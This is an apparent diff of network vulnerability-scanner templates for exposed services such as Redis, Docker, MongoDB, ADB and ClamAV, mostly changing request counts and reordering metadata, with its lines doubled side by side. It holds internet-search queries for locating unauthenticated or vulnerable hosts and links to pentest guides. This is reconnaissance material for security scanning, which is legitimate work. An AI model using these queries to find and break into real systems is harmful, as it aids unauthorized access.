shodan-query: 'product:"Niagara Fox"'
reference: reference:
- https://nmap.org/nsedoc/scripts/fox-info.html - https://nmap.org/nsedoc/scripts/fox-info.html
metadata:
max-request: 1
shodan-query: product:"Niagara Fox"
verified: true
tags: network,fox,niagara,enum tags: network,fox,niagara,enum
tcp: tcp:

View File

@ -9,7 +9,7 @@ info:
reference: reference:
- https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: port:5432 product:"PostgreSQL" shodan-query: port:5432 product:"PostgreSQL"
verified: "true" verified: "true"
tags: network,postgresql,db,unauth,enum,psql tags: network,postgresql,db,unauth,enum,psql

View File

@ -9,9 +9,9 @@ info:
reference: reference:
- https://nmap.org/nsedoc/scripts/smtp-commands.html - https://nmap.org/nsedoc/scripts/smtp-commands.html
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: smtp
verified: true verified: true
shodan-query: 'smtp'
tags: network,enum,smtp,mail tags: network,enum,smtp,mail
tcp: tcp:

View File

@ -9,7 +9,7 @@ info:
reference: reference:
- https://nmap.org/nsedoc/scripts/smtp-enum-users.html - https://nmap.org/nsedoc/scripts/smtp-enum-users.html
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: smtp shodan-query: smtp
verified: true verified: true
tags: network,enum,smtp,mail tags: network,enum,smtp,mail

View File

@ -15,9 +15,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3 cvss-score: 5.3
cwe-id: CWE-200 cwe-id: CWE-200
tags: network,cisco,smi,exposure
metadata: metadata:
max-request: 2 max-request: 1
tags: network,cisco,smi,exposure
tcp: tcp:
- inputs: - inputs:

View File

@ -9,9 +9,9 @@ info:
- https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20 - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20
- https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge
- https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/
tags: network,adb,rce,android,exposure
metadata: metadata:
max-request: 2 max-request: 1
tags: network,adb,rce,android,exposure
tcp: tcp:
- inputs: - inputs:

View File

@ -7,9 +7,9 @@ info:
description: | description: |
Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: port:2375 product:"docker" shodan-query: port:2375 product:"docker"
verified: true
tags: network,docker,exposure tags: network,docker,exposure
tcp: tcp:

View File

@ -12,7 +12,7 @@ info:
cvss-score: 7.2 cvss-score: 7.2
cwe-id: CWE-306 cwe-id: CWE-306
metadata: metadata:
max-request: 4 max-request: 1
tags: network,redis,unauth,exposure tags: network,redis,unauth,exposure
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: Apache ZooKeeper was able to be accessed without any required authentication. description: Apache ZooKeeper was able to be accessed without any required authentication.
reference: reference:
- https://zookeeper.apache.org/security.html - https://zookeeper.apache.org/security.html
tags: network,zookeeper,unauth,exposure
metadata: metadata:
max-request: 2 max-request: 1
tags: network,zookeeper,unauth,exposure
tcp: tcp:
- inputs: - inputs:

View File

@ -10,7 +10,7 @@ info:
- https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/
metadata: metadata:
fofa-query: apache dubbo fofa-query: apache dubbo
max-request: 2 max-request: 1
verified: true verified: true
tags: network,dubbo,apache,unauth,misconfig tags: network,dubbo,apache,unauth,misconfig

View File

@ -10,7 +10,7 @@ info:
- https://rocketmq.apache.org/docs/bestPractice/03access - https://rocketmq.apache.org/docs/bestPractice/03access
metadata: metadata:
fofa-query: protocol="rocketmq" fofa-query: protocol="rocketmq"
max-request: 2 max-request: 1
shodan-query: title:"RocketMQ" shodan-query: title:"RocketMQ"
verified: true verified: true
tags: network,rocketmq,broker,apache,unauth,misconfig tags: network,rocketmq,broker,apache,unauth,misconfig

View File

@ -8,13 +8,13 @@ info:
ClamAV server 0.99.2, and possibly other previous versions, allow the execution ClamAV server 0.99.2, and possibly other previous versions, allow the execution
of dangerous service commands without authentication. Specifically, the command 'SCAN' of dangerous service commands without authentication. Specifically, the command 'SCAN'
may be used to list system files and the command 'SHUTDOWN' shut downs the service. may be used to list system files and the command 'SHUTDOWN' shut downs the service.
metadata:
max-request: 2
verified: true
shodan-query: 'port:3310 product:"ClamAV" version:"0.99.2"'
reference: reference:
- https://seclists.org/nmap-dev/2016/q2/201 - https://seclists.org/nmap-dev/2016/q2/201
- https://bugzilla.clamav.net/show_bug.cgi?id=11585 - https://bugzilla.clamav.net/show_bug.cgi?id=11585
metadata:
max-request: 1
shodan-query: port:3310 product:"ClamAV" version:"0.99.2"
verified: true
tags: network,clamav,unauth,seclists,misconfig tags: network,clamav,unauth,seclists,misconfig
tcp: tcp:

View File

@ -5,9 +5,9 @@ info:
author: lu4nx author: lu4nx
severity: high severity: high
description: ClickHouse was able to be accessed with no required authentication in place. description: ClickHouse was able to be accessed with no required authentication in place.
tags: network,clickhouse,unauth,misconfig
metadata: metadata:
max-request: 2 max-request: 1
tags: network,clickhouse,unauth,misconfig
tcp: tcp:
- inputs: - inputs:

View File

@ -6,14 +6,14 @@ info:
severity: low severity: low
description: | description: |
The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable.
remediation: |
Disable the weak algorithms.
reference: | reference: |
https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled
remediation: |
Disable the weak algorithms.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"Dropbear sshd"
verified: true verified: true
shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,misconfig tags: network,ssh,dropbear,misconfig
tcp: tcp:

View File

@ -6,14 +6,14 @@ info:
severity: low severity: low
description: | description: |
The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client.
remediation: |
Disable MD5 and 96-bit MAC algorithms.
reference: | reference: |
https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled
remediation: |
Disable MD5 and 96-bit MAC algorithms.
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"Dropbear sshd"
verified: true verified: true
shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,misconfig tags: network,ssh,dropbear,misconfig
tcp: tcp:

View File

@ -7,9 +7,9 @@ info:
description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids. description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids.
reference: reference:
- http://ganglia.info/ - http://ganglia.info/
tags: ganglia,network,misconfig
metadata: metadata:
max-request: 2 max-request: 1
tags: ganglia,network,misconfig
tcp: tcp:
- inputs: - inputs:

View File

@ -4,11 +4,11 @@ info:
name: Memcached stats disclosure name: Memcached stats disclosure
author: pdteam author: pdteam
severity: low severity: low
tags: network,memcached,misconfig
description: | description: |
Memcached stats is used to return server statistics such as PID, version, connections, etc. Memcached stats is used to return server statistics such as PID, version, connections, etc.
metadata: metadata:
max-request: 2 max-request: 1
tags: network,memcached,misconfig
tcp: tcp:
- inputs: - inputs:

View File

@ -10,9 +10,9 @@ info:
- https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
- https://www.mongodb.com/features/mongodb-authentication - https://www.mongodb.com/features/mongodb-authentication
remediation: Enable Authentication in MongoDB remediation: Enable Authentication in MongoDB
tags: network,mongodb,unauth,misconfig
metadata: metadata:
max-request: 2 max-request: 1
tags: network,mongodb,unauth,misconfig
tcp: tcp:
- inputs: - inputs:

View File

@ -9,11 +9,10 @@ info:
- https://github.com/Tinram/MySQL-Brute - https://github.com/Tinram/MySQL-Brute
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: network,mysql,bruteforce,db,misconfig
metadata: metadata:
max-request: 2 max-request: 1
tags: network,mysql,bruteforce,db,misconfig
tcp: tcp:
- host: - host:

View File

@ -8,9 +8,9 @@ info:
reference: reference:
- https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner - https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner
- https://support.sap.com/en/tools/connectivity-tools/saprouter.html - https://support.sap.com/en/tools/connectivity-tools/saprouter.html
tags: network,sap,misconfig
metadata: metadata:
max-request: 2 max-request: 1
tags: network,sap,misconfig
tcp: tcp:
- inputs: - inputs:

View File

@ -9,9 +9,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3 cvss-score: 5.3
cwe-id: CWE-200 cwe-id: CWE-200
tags: network,tidb,bruteforce,db,misconfig
metadata: metadata:
max-request: 2 max-request: 1
tags: network,tidb,bruteforce,db,misconfig
tcp: tcp:
- host: - host:

View File

@ -6,7 +6,7 @@ info:
severity: high severity: high
description: TiDB server was able to be accessed because no authentication was required. description: TiDB server was able to be accessed because no authentication was required.
metadata: metadata:
max-request: 2 max-request: 1
zoomeye-query: tidb +port:"4000" zoomeye-query: tidb +port:"4000"
tags: network,tidb,unauth,misconfig tags: network,tidb,unauth,misconfig

View File

@ -9,7 +9,7 @@ info:
reference: reference:
- https://www.postgresql.org/docs/9.6/auth-methods.html - https://www.postgresql.org/docs/9.6/auth-methods.html
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: port:5432 product:"PostgreSQL" shodan-query: port:5432 product:"PostgreSQL"
verified: "true" verified: "true"
tags: network,postgresql,db,unauth,misconfig tags: network,postgresql,db,unauth,misconfig

View File

@ -10,11 +10,11 @@ info:
- https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0 cvss-score: 10
cwe-id: CWE-77 cwe-id: CWE-77
tags: clockwatch,rce,network
metadata: metadata:
max-request: 2 max-request: 1
tags: clockwatch,rce,network
tcp: tcp:
- inputs: - inputs: